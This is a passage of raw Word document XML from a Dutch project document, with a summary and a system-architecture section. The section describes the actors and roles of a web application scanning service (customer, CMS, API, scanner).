          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="004886D4" w14:textId="2E49E6FF" w:rsidR="00D20F63" w:rsidRDefault="00DC2E88">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96844">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251794432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41330398" wp14:editId="5A86EEC6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1647190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1394460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2584450" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="31750" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21653" y="21600"/>
                    <wp:lineTo x="21653" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="509" name="Rectangle 509"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2584450" cy="6858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BF7F621" id="Rectangle 509" o:spid="_x0000_s1026" style="position:absolute;margin-left:129.7pt;margin-top:109.8pt;width:203.5pt;height:54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Bvf6ACAADTBQAADgAAAGRycy9lMm9Eb2MueG1srFRRbxoxDH6ftP8Q5X29g0FHUY8KUTFNqlrU&#10;dupzyCXcSbk4SwIH+/VzkuNgXTdN03gIcWx/tr+zfX2zbxTZCetq0AUdXOSUCM2hrPWmoF+flx8m&#10;lDjPdMkUaFHQg3D0Zvb+3XVrpmIIFahSWIIg2k1bU9DKezPNMscr0TB3AUZoVEqwDfMo2k1WWtYi&#10;eqOyYZ5fZi3Y0ljgwjl8vU1KOov4UgruH6R0whNVUMzNx9PGcx3ObHbNphvLTFXzLg32D1k0rNYY&#10;tIe6ZZ6Rra1/gWpqbsGB9BccmgykrLmINWA1g/xVNU8VMyLWguQ409Pk/h8sv9+tLKnLgo7zK0o0&#10;a/AjPSJtTG+UIOERKWqNm6Llk1nZTnJ4DfXupW3CP1ZC9pHWQ0+r2HvC8XE4noxGY2Sfo+5yMp7k&#10;kffs5G2s858FNCRcCmoxfmST7e6cx4hoejQJwRyoulzWSkUhtIpYKEt2DD/yejNMrspULD19zPEX&#10;ykCY2FjBOknnQEr/DXYHc3JE0OCZBY4SK/HmD0oEPKUfhUSCAw8xsT6DlBzjXGg/SKqKlSI9j3+b&#10;cwQMyBIJ6LE7gJ+5OGKnnDv74CriZPTO+Z8SS869R4wM2vfOTa3BvgWgsKoucrI/kpSoCSytoTxg&#10;+1lIc+kMX9bYAXfM+RWzOIjYNLhc/AMeUkFbUOhulFRgv7/1HuxxPlBLSYuDXVD3bcusoER90Tg5&#10;V4PRKGyCKIzGn4Yo2HPN+lyjt80CsK0GuMYMj9dg79XxKi00L7iD5iEqqpjmGLug3NujsPBp4eAW&#10;42I+j2Y4/Yb5O/1keAAPrIYOf96/MGu6MfA4QPdwXAJs+moakm3w1DDfepB1HJUTrx3fuDlis3db&#10;LqymczlanXbx7AcAAAD//wMAUEsDBBQABgAIAAAAIQAdd21Z3wAAAAsBAAAPAAAAZHJzL2Rvd25y&#10;ZXYueG1sTI/LTsMwEEX3SPyDNUjsqNNATRviVIAEG8Si5bV14yGJsMchdtr07xlWsJvH0Z0z5Xry&#10;TuxxiF0gDfNZBgKpDrajRsPry8PFEkRMhqxxgVDDESOsq9OT0hQ2HGiD+21qBIdQLIyGNqW+kDLW&#10;LXoTZ6FH4t1nGLxJ3A6NtIM5cLh3Ms8yJb3piC+0psf7Fuuv7eg11Mvnp3g3jW/uEdHkHwv/fdy8&#10;a31+Nt3egEg4pT8YfvVZHSp22oWRbBROQ75YXTHKxXylQDChlOLJTsNlfq1AVqX8/0P1AwAA//8D&#10;AFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9U&#10;eXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9y&#10;ZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHSAb3+gAgAA0wUAAA4AAAAAAAAAAAAAAAAALAIAAGRy&#10;cy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAB13bVnfAAAACwEAAA8AAAAAAAAAAAAAAAAA+AQA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAEBgAAAAA=&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E81226" w:rsidRPr="00B96844">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EA7EA" w14:textId="2FF7C81A" w:rsidR="00675FD3" w:rsidRPr="00675FD3" w:rsidRDefault="00675FD3">
      <w:r>
        <w:t>In dit concept document zijn we bij de klant begonnen en</w:t>
      </w:r>
      <w:r w:rsidR="00077D74">
        <w:t xml:space="preserve"> bij de klant geëindigd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3365B1BF" w14:textId="1EFBC528" w:rsidR="00652D83" w:rsidRDefault="00517F4D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251905024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BC760C1" wp14:editId="6AD7A20E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3175</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3269615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4297680" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="221" name="Text Box 221"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4297680" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3A4A1481" w14:textId="1D9B7496" w:rsidR="00CE4BB5" w:rsidRPr="00DD5435" w:rsidRDefault="00CE4BB5" w:rsidP="00517F4D">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.13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760C1" id="Text Box 221" o:spid="_x0000_s1109" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.25pt;margin-top:257.45pt;width:338.4pt;height:21.2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UfWzkCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFTBjtowEL1X6j9YvpdA1AIbEVaUFVUltLsS&#10;VHs2jkMs2R7XNiT06zt2CNtue6p6MeOZyRvPezMs7jutyFk4L8GUdDIaUyIMh0qaY0m/7Tcf5pT4&#10;wEzFFBhR0ovw9H75/t2itYXIoQFVCUcQxPiitSVtQrBFlnneCM38CKwwGKzBaRbw6o5Z5ViL6Fpl&#10;+Xg8zVpwlXXAhffofeiDdJnw61rw8FTXXgSiSopvC+l06TzEM1suWHF0zDaSX5/B/uEVmkmDRW9Q&#10;DywwcnLyDygtuQMPdRhx0BnUteQi9YDdTMZvutk1zIrUC5Lj7Y0m//9g+eP52RFZlTTPJ5QYplGk&#10;vegC+QwdiT5kqLW+wMSdxdTQYQCVHvwenbHxrnY6/mJLBOPI9eXGb4Tj6PyY382mcwxxjOXTu/ns&#10;U4TJXr+2zocvAjSJRkkd6pdoZeetD33qkBKLeVCy2kil4iUG1sqRM0Ot20YGcQX/LUuZmGsgftUD&#10;9h6RhuVaJTbcNxat0B26RNFsOnR9gOqCZDjoB8pbvpFYfst8eGYOJwibxK0IT3jUCtqSwtWipAH3&#10;42/+mI/CYpSSFieypP77iTlBifpqUPI4voPhBuMwGOak14CNo4j4mmTiBy6owawd6BdcllWsgiFm&#10;ONYqaRjMdej3ApeNi9UqJeGQWha2Zmd5hB5o3ncvzNmrSAHlfYRhVlnxRqs+N6llV6eAxCchI7E9&#10;izgA8YIDnkbhuoxxg369p6zXv4zlTwAAAP//AwBQSwMEFAAGAAgAAAAhAOZ3Hz7hAAAACAEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SCyIOqVpUkKcqqpggKUidOnmxm4ciM+R7bTh&#10;33NMsJx0957efa9cT7ZnZ+1D51DAfJYA09g41WErYP/xcr8CFqJEJXuHWsC3DrCurq9KWSh3wXd9&#10;rmPLKARDIQWYGIeC89AYbWWYuUEjaSfnrYy0+pYrLy8Ubnv+kCQZt7JD+mDkoLdGN1/1aAXs0sPO&#10;3I2n57dNuvCv+3Gbfba1ELc30+YJWNRT/DPDLz6hQ0VMRzeiCqwXsCQfzXn6CIzkLM8XwI50WeYp&#10;8Krk/wtUPwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCxdR9bOQIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDmdx8+4QAAAAgBAAAPAAAA&#10;AAAAAAAAAAAAAJEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3A4A1481" w14:textId="1D9B7496" w:rsidR="00CE4BB5" w:rsidRPr="00DD5435" w:rsidRDefault="00CE4BB5" w:rsidP="00517F4D">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.13</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D20F63">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251793408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68866030" wp14:editId="527153DB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4297902" cy="3209687"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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297902" cy="3209687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00652D83">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C1E99" w14:textId="67AB19D3" w:rsidR="004A42A1" w:rsidRPr="00C52E21" w:rsidRDefault="00C52E21" w:rsidP="00BA2E92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc491022087"/>
      <w:r w:rsidRPr="00C52E21">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="008529CC">
        <w:t xml:space="preserve">Systeem en </w:t>
      </w:r>
      <w:r w:rsidR="00283F01" w:rsidRPr="00C52E21">
        <w:t>Software architectuur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="576015B9" w14:textId="4F9238E1" w:rsidR="00243098" w:rsidRDefault="00A53DB1" w:rsidP="00C00EE2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A64B2FC" wp14:editId="35373778">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-160655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>168910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6515735" cy="1699260"/>
                <wp:effectExtent l="0" t="0" r="18415" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="32" name="Text Box 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6515735" cy="169926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D504566" w14:textId="5983D72D" w:rsidR="00CE4BB5" w:rsidRPr="00470061" w:rsidRDefault="00CE4BB5" w:rsidP="00243098">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13569140" wp14:editId="583F0F0B">
                                  <wp:extent cx="266700" cy="266700"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="519"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CE4BB5" w:rsidRPr="007F50D4" w:rsidRDefault="00CE4BB5"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CE4BB5" w:rsidRPr="00A53DB1" w:rsidRDefault="00CE4BB5"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4B2FC" id="_x0000_s1110" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.65pt;margin-top:13.3pt;width:513.05pt;height:133.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2MzaICAADYBQAADgAAAGRycy9lMm9Eb2MueG1srFTfT9swEH6ftP/B8vtIU2i7VqSoAzFNYoBW&#10;Jp5dx26j2T7PdpuUv35nJykdQ5qY9pLYd9/9+nx35xeNVmQnnK/AFDQ/GVAiDIeyMuuCfn+4/vCR&#10;Eh+YKZkCIwq6F55ezN+/O6/tTAxhA6oUjqAT42e1LegmBDvLMs83QjN/AlYYVEpwmgW8unVWOlaj&#10;d62y4WAwzmpwpXXAhfcovWqVdJ78Syl4uJPSi0BUQTG3kL4ufVfxm83P2WztmN1UvEuD/UMWmlUG&#10;gx5cXbHAyNZVf7jSFXfgQYYTDjoDKSsuUg1YTT54Uc1yw6xItSA53h5o8v/PLb/d3TtSlQU9HVJi&#10;mMY3ehBNIJ+gIShCfmrrZwhbWgSGBuX4zr3cozCW3Uin4x8LIqhHpvcHdqM3jsLxKB9NTkeUcNTl&#10;4+l0OE78Z8/m1vnwWYAm8VBQh8+XWGW7Gx8wFYT2kBjNg6rK60qpdIktIy6VIzuGj71a58lUbfVX&#10;KFvZdDQY9CFTh0V48vqbJ2X+5jw0iQFM58gQb62lSH3XZRzZa1lKp7BXInpX5puQyHsi65X0GefC&#10;hD5KQkeUxGLfYtjho2mb1VuMDxYpMphwMNaVAZfoPdDYMlz+6FOWLR7ZPao7HkOzalLDTSZ9F62g&#10;3GNzOWjH01t+XWED3DAf7pnDecR+wh0T7vAjFdQFhe5EyQbc02vyiMcxQS0lNc53Qf3PLXOCEvXF&#10;4ABN87OzuBDS5Ww0GeLFHWtWxxqz1ZeAXZXjNrM8HSM+qP4oHehHXEWLGBVVzHCMXdDQHy9Du3Vw&#10;lXGxWCQQrgDLwo1ZWh5dR5pjez80j8zZbgYCjs8t9JuAzV6MQouNlgYW2wCySnMSiW5Z7R4A10dq&#10;9G7Vxf10fE+o54U8/wUAAP//AwBQSwMEFAAGAAgAAAAhAJrJS+DeAAAACwEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj8FOwzAMhu9IvENkJC5oSyhQjdJ0gkkcOTAQ2jFrTFvROCVJu+7t8U7saPvT7+8v&#10;17PrxYQhdp403C4VCKTa244aDZ8fr4sViJgMWdN7Qg1HjLCuLi9KU1h/oHectqkRHEKxMBralIZC&#10;yli36Exc+gGJb98+OJN4DI20wRw43PUyUyqXznTEH1oz4KbF+mc7Og32K8xHu6ndbqp/h/HlZnoL&#10;Smp9fTU/P4FIOKd/GE76rA4VO+39SDaKXsMie7hjVEOW5yBOgFKKy+x583ifgaxKed6h+gMAAP//&#10;AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABf&#10;cmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD5rYzNogIAANgFAAAOAAAAAAAAAAAAAAAAACwCAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCayUvg3gAAAAsBAAAPAAAAAAAAAAAAAAAAAPoE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAABQYAAAAA&#10;" fillcolor="#f2f2f2 [3052]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D504566" w14:textId="5983D72D" w:rsidR="00CE4BB5" w:rsidRPr="00470061" w:rsidRDefault="00CE4BB5" w:rsidP="00243098">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13569140" wp14:editId="583F0F0B">
                            <wp:extent cx="266700" cy="266700"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="519"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CE4BB5" w:rsidRPr="007F50D4" w:rsidRDefault="00CE4BB5"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CE4BB5" w:rsidRPr="00A53DB1" w:rsidRDefault="00CE4BB5"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v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="73115FD3" w14:textId="756F30C1" w:rsidR="00243098" w:rsidRDefault="00243098" w:rsidP="00C00EE2"/>
    <w:p w14:paraId="52786539" w14:textId="447CC3E6" w:rsidR="0042168E" w:rsidRDefault="0042168E" w:rsidP="00467636">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc491022088"/>
      <w:r>
        <w:t>5.1 Het systeem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="0174319D" w14:textId="214177C5" w:rsidR="00467636" w:rsidRDefault="00467636" w:rsidP="00467636"/>
    <w:p w14:paraId="679C7623" w14:textId="76EAC2A5" w:rsidR="00467636" w:rsidRDefault="00620167" w:rsidP="00620167">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc491022089"/>
      <w:r>
        <w:t xml:space="preserve">5.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00467636">
        <w:t>Systeem context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="69CC7D84" w14:textId="7656A86B" w:rsidR="00716C78" w:rsidRDefault="008E4DB0" w:rsidP="00467636">
      <w:r>
        <w:t xml:space="preserve">De context van het systeem wordt als een black box laten zien met alle externe entiteiten, zowel mensen als systemen. </w:t>
      </w:r>
      <w:r w:rsidR="005461BC">
        <w:t xml:space="preserve">Het systeem vanuit een black box perspectief heeft drie actoren, twee mensen: klant en Administrator en de API die de communicatie regelt tussen de CMS en </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="005461BC">
        <w:t xml:space="preserve"> Scanner. </w:t>
      </w:r>
      <w:r w:rsidR="00CB32FB">
        <w:t xml:space="preserve">De CMS en </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>Webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00CB32FB">
        <w:t xml:space="preserve"> Scanner zijn systemen waarmee de actoren, externe entiteiten, interactie hebben.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1135" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2251"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A47E7E" w14:paraId="45F8E1DD" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="160C7AC4" w14:textId="5208F14A" w:rsidR="00A47E7E" w:rsidRDefault="00A47E7E" w:rsidP="00467636">
            <w:r>
              <w:t>Actor</w:t>
            </w:r>
            <w:r w:rsidR="006F58B2">
              <w:t>/Systeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77CE7203" w14:textId="784842E5" w:rsidR="00A47E7E" w:rsidRDefault="00A47E7E" w:rsidP="00467636">
            <w:r>
              <w:t>Rol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A47E7E" w14:paraId="52EC4295" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77FDB007" w14:textId="629B4313" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t>Klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A56E717" w14:textId="6C819434" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t xml:space="preserve">Aanvragen van een </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008272A8">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidR="005A1D72">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008272A8">
              <w:t>applicatie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A47E7E" w14:paraId="4B6EFE66" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CC3372E" w14:textId="34E1F1DC" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t>CMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7828AC82" w14:textId="5C521F79" w:rsidR="00A47E7E" w:rsidRDefault="00967F11" w:rsidP="00467636">
            <w:r>
              <w:t>Aanvraagformulier</w:t>
            </w:r>
            <w:r w:rsidR="006F58B2">
              <w:t xml:space="preserve"> doorsturen naar de API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A47E7E" w14:paraId="4B0923C1" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C225C9A" w14:textId="1814285A" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D478012" w14:textId="586616F7" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t xml:space="preserve">De aanvraag verwerken en opdracht geven aan de </w:t>
            </w:r>
            <w:r w:rsidR="008272A8">
              <w:t>Webapplicatie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A47E7E" w14:paraId="23FB00C3" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38AD8E90" w14:textId="13C0DE39" w:rsidR="00A47E7E" w:rsidRDefault="008272A8" w:rsidP="00467636">
            <w:r>
              <w:t>Webapplicatie</w:t>
            </w:r>
            <w:r w:rsidR="006F58B2">
              <w:t xml:space="preserve"> Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7542EFEB" w14:textId="46DF3F38" w:rsidR="00A47E7E" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t>Scan opdracht uitvoeren</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037176F" w14:paraId="211130D1" w14:textId="77777777" w:rsidTr="00047444">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2251" w:type="dxa"/>
          </w:tcPr>
